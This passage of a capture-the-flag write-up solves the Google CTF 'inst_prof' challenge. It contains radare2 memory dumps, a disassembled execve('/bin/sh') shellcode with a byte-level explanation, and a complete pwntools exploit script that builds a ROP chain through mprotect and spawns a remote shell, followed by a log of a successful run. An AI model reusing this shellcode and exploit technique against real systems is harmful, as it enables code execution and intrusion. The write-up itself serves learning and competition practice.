0x56103a1800e0  0x561039f7ea200000  0x56103a1800a80000   .. ..9.V.....:.V
0x56103a1800f0  0x0000000000000000  0x0000000000000000   ................
[0x7f0e471a5000]> pxq 0x30 @ r15
0x56103a1800d2  0x0000561039f7ebc3  0x000056103a180000   ...9.V.....:.V..
0x56103a1800e2  0x0000561039f7ea20  0x000056103a1800a8    ..9.V.....:.V..
0x56103a1800f2  0x0000000000000000  0x0000000000000000   ................
[0x7f0e471a5000]> pd 2 @ [r15]
            0x561039f7ebc3      5f             pop rdi
            0x561039f7ebc4      c3             ret
[0x7f0e471a5000]> pd 6 @ [r15 + 0x10]
        |   ;-- make_page_executable:
        |   0x561039f7ea20      55             push rbp
        |   0x561039f7ea21      ba05000000     mov edx, 5
        |   0x561039f7ea26      be00100000     mov esi, 0x1000         ; rsi
        |   0x561039f7ea2b      4889e5         mov rbp, rsp
        |   0x561039f7ea2e      5d             pop rbp
        `=< 0x561039f7ea2f      e9ecfdffff     jmp sym.imp.mprotect
[0x7f0e471a5000]> pd 16 @ [r15 + 0x18]
            ;-- r14:
            0x56103a1800a8      4831c0         xor rax, rax
            0x56103a1800ab      4889ec         mov rsp, rbp
            0x56103a1800ae      50             push rax
            0x56103a1800af      4889e2         mov rdx, rsp
            0x56103a1800b2      48bbff2f6269.  movabs rbx, 0x68732f6e69622fff
            0x56103a1800bc      48c1eb08       shr rbx, 8
            0x56103a1800c0      53             push rbx
            0x56103a1800c1      4889e7         mov rdi, rsp
            0x56103a1800c4      50             push rax
            0x56103a1800c5      52             push rdx
            0x56103a1800c6      4889e2         mov rdx, rsp
            0x56103a1800c9      50             push rax
            0x56103a1800ca      57             push rdi
            0x56103a1800cb      4889e6         mov rsi, rsp
            0x56103a1800ce      b03b           mov al, 0x3b            ; ';' ; 59
            0x56103a1800d0      0f05           syscall

I use the pd commands above to illustrate that each address (save for the GOT address) at r15 points to the appropriate address in the executable for our ROP chain.
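To show how these four qwords get consumed once rsp points at them, here is a small model of the chain. It is a sketch only: the addresses are copied from the pxq output at r15 above (they belong to that one run), the walk function is a made-up name, and nothing here touches a real process.

```python
import struct

# Addresses from the pxq 0x30 @ r15 output above (valid for that run only)
POP_RDI = 0x561039f7ebc3
GOT_PAGE = 0x56103a180000
MAKE_PAGE_EXECUTABLE = 0x561039f7ea20
SHELLCODE = 0x56103a1800a8

# The chain as it sits in memory: four little-endian qwords
chain = struct.pack("<4Q", POP_RDI, GOT_PAGE, MAKE_PAGE_EXECUTABLE, SHELLCODE)

def walk(chain_bytes):
    """Model how successive ret/pop instructions consume the chain."""
    count = len(chain_bytes) // 8
    qwords = list(struct.unpack("<%dQ" % count, chain_bytes))
    first_rip = qwords.pop(0)   # ret after mov rsp, r15 -> pop rdi gadget
    rdi = qwords.pop(0)         # pop rdi -> page-aligned GOT address
    second_rip = qwords.pop(0)  # ret -> make_page_executable
    final_rip = qwords.pop(0)   # ret at the end of mprotect -> shellcode
    return first_rip, rdi, second_rip, final_rip

print([hex(value) for value in walk(chain)])
```

make_page_executable pushes and pops rbp before jumping to mprotect, so the stack pointer is back where it started and mprotect's own ret picks up the shellcode address.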

The last pd at [r15 + 0x18] shows my disassembled shellcode. I had to update my shellcode for this challenge to set rsp to point back at the original stack space stored in rbp (the mov rsp, rbp instruction above) because the GOT was no longer marked as writable (which the stack needs to be, since I used push instructions in my shellcode).
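One detail of the shellcode that is easy to miss in the disassembly is how the "/bin/sh" string is built: the movabs loads the string with a leading 0xff byte, and the shr rbx, 8 shifts that byte out and a zero terminator in. I assume the point is to keep a null byte out of the shellcode itself. The sketch below checks this in plain Python 3, with the bytes copied from the disassembly above.

```python
SHELLCODE = bytes.fromhex(
    "4831c0"                # xor rax, rax
    "4889ec"                # mov rsp, rbp
    "50"                    # push rax
    "4889e2"                # mov rdx, rsp
    "48bbff2f62696e2f7368"  # movabs rbx, 0x68732f6e69622fff
    "48c1eb08"              # shr rbx, 8
    "53"                    # push rbx
    "4889e7"                # mov rdi, rsp
    "50"                    # push rax
    "52"                    # push rdx
    "4889e2"                # mov rdx, rsp
    "50"                    # push rax
    "57"                    # push rdi
    "4889e6"                # mov rsi, rsp
    "b03b"                  # mov al, 0x3b (execve)
    "0f05"                  # syscall
)

# The 8-byte immediate of the movabs starts after its 2-byte opcode at offset 10
immediate = int.from_bytes(SHELLCODE[12:20], "little")
path = (immediate >> 8).to_bytes(8, "little")
print(hex(immediate), path, len(SHELLCODE))
```

The 42 bytes match the span from 0x...a8 to 0x...d1 in the dump, which is why r15 ends up at the unaligned address 0x...d2.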

All that's left is to load our rop chain address in r15 into rsp, and watch it rain shell:

p.send("\x4c\x89\xfc\xc3") #mov rsp, r15; ret

At this point I tested locally and got a shell, before re-instrumenting and ever so slightly refactoring the code to launch it remotely.

The Sweet, Sweet Solution

I thought about refactoring the code so that my brazenly bullheaded way of inputting/running assembly commands would be less obvious, however I decided to just leave it in (more or less) the form it was in when I actually got the flag.

Something I found interesting about the solution for this challenge is that unlike in prior CTFs, we didn't have to rely on any information leakage at all. Indeed, it wasn't until the CTF was over and I saw some others' techniques for solving this challenge that I saw that we could have used the r12 register to leak data (albeit in a slightly obfuscated manner) with the subsequent call to write() that the program made.

Also, I now know that pwntools has an asm() function that will simplify my life in the future ;)

#!/usr/bin/env python2
from pwn import *
from time import sleep
from IPython import embed

ret = "\xc3"
testing = False  #set to True to run against the local binary

if testing:
    p = process("./inst_prof")
else:
    #p = remote("", 9090)
    p = remote("inst-prof.ctfcompetition.com", 1337)
    #context.timeout = 0.2

def writeByteStr(byteString):
    writeCmd = '\x41\xc6\x07'   #mov byte [r15], {}
    incCmd = '\x49\xff\xc7'     #inc r15
    for b in byteString:

        p.send(writeCmd + b)
        p.send(incCmd + ret)

def shiftR15Qword():
    for x in range(8):
        p.send("\x49\xff\xc7\xc3") #inc r15

def main():
    #read initial output:

    #now program is waiting for our 4 bytes
    #first we create our "2nd stack" where we'll store our ROP

    #get text section reference:
    p.send("\x4c\x8b\x2c\x24")  #mov r13, [rsp]

    #constant offset from text.seg.ref to GOT:
    #[rsp] + 0x2014e8 == GOT
    #go 0xa0 further than that to get to blank section
    #total offset == 0x2014e8 + 0xa0 == 0x201588
    #get offset into r14 (r14 is 0 right now):
    p.send("\x49\x01\xf6" + ret) #add r14, rsi #rsi == 0x1000
    #now double r14 9 times:
    for x in range(0x9):
        p.send("\x4d\x01\xf6" + ret) #add r14, r14
    #now r14 is 0x200000, add another 0x1000:
    p.send("\x49\x01\xf6" + ret) #add r14, rsi

    #0x588 left
    #r11 seems to be 0x246 all the time....
    for x in range(2):
        p.send("\x4d\x01\xde" + ret) #add r14, r11

    #0x5c + 0xa0 left:
    for x in range(0x5c):
        p.send("\x49\xff\xc6" + ret) #inc r14

    #now we have GOT Address, save it:
    p.send("\x4d\x01\xf5" + ret) #add r13, r14
    #clear r14:
    p.send("\x4d\x31\xf6" + ret) #xor r14, r14

    for x in range(0xa0):
        p.send("\x49\xff\xc6" + ret) #inc r14

    #now copy to r15:
    p.send("\x4d\x89\xef" + ret) #mov r15, r13

    #now add r15, r14:
    p.send("\x4d\x01\xf7" + ret) #add r15, r14

    #save second stack pointer
    p.send("\x4d\x89\xfe" + ret) #mov r14, r15

    #get r15 past the spare qword at [r14] (it will hold the GOT address)
    shiftR15Qword()

    #now lets write our shellcode:
    writeByteStr('\x48\x31\xc0\x48\x89\xec\x50\x48\x89\xe2\x48\xbb\xff\x2f' + \
        '\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x52' + \
        '\x48\x89\xe2\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05')

    #save GOT address at [r14]:
    p.send("\x4d\x89\x2e" + ret) #mov [r14], r13

    #now we need pop rdi gadget
    #pop rdi == [rsp] + 0xab
    p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
    for x in range(0xab):
        p.send("\x49\xff\xc5" + ret) #inc r13

    #save pop addr on rop stack:
    p.send("\x4d\x89\x2f" + ret)    #mov [r15], r13

    #save addr of region to be mprotected as 1st rop gadget arg:
    p.send("\x4d\x8b\x2e" + ret) #mov r13, [r14]
    p.send("\x4d\x89\x6f\x08")    #mov [r15+8], r13

    #now we need to call mprotect and jump to shellcode:
    #mprotect is [rsp] - 0xf8
    p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
    for x in range(0xf8):
        p.send("\x49\xff\xcd" + ret) #dec r13

    #push mprotect gadget:
    p.send("\x4d\x89\x6f\x10")    #mov [r15+0x10], r13

    #save current second stack pointer into r13:
    p.send("\x4d\x89\xfd" + ret) #mov r13, r15
    #advance pointer 3 qwords
    for x in range(0x18):
        p.send("\x49\xff\xc5" + ret) #inc r13

    #point r14 to our shellcode
    for x in range(0x8):
        p.send("\x49\xff\xc6" + ret) #inc r14

    #and write shellcode address here:
    p.send("\x4d\x89\x75\x00") #mov [r13], r14

    #now we set rsp == r15 and let it "rip"..heh
    p.send("\x4c\x89\xfc\xc3") #mov rsp, r15; ret

    #hand the connection over to the spawned shell
    p.interactive()


if __name__ == "__main__":
    main()

And here is what it looked like running it:

-> % ./solver.py
[+] Opening connection to inst-prof.ctfcompetition.com on port 1337: Done
initializing prof...ready

[*] Switching to interactive mode
...<redacted lots of bytes>...
$ ls
$ cat flag.txt
$ exit
[*] Got EOF while reading in interactive


Overall I found this challenge quite instructive, further deepening my understanding of libc function calls, system calls, and x86 in general. I'd like to thank Google for putting on such a fun CTF, as well as my friend Ambrose for staying up with me and working on such a large part of this challenge.

Of course I wouldn't be able to do this without the proper tools, so I thank the radare2 team for such a great tool, as well as the Pwntools team for theirs.

Please let me know if there are any parts of this writeup that are unclear, or worse, incorrect, and I'll be glad to try fixing them, as well as glad to know that someone has read some of it. I hope that there is something in here that helps you too.

Until next time!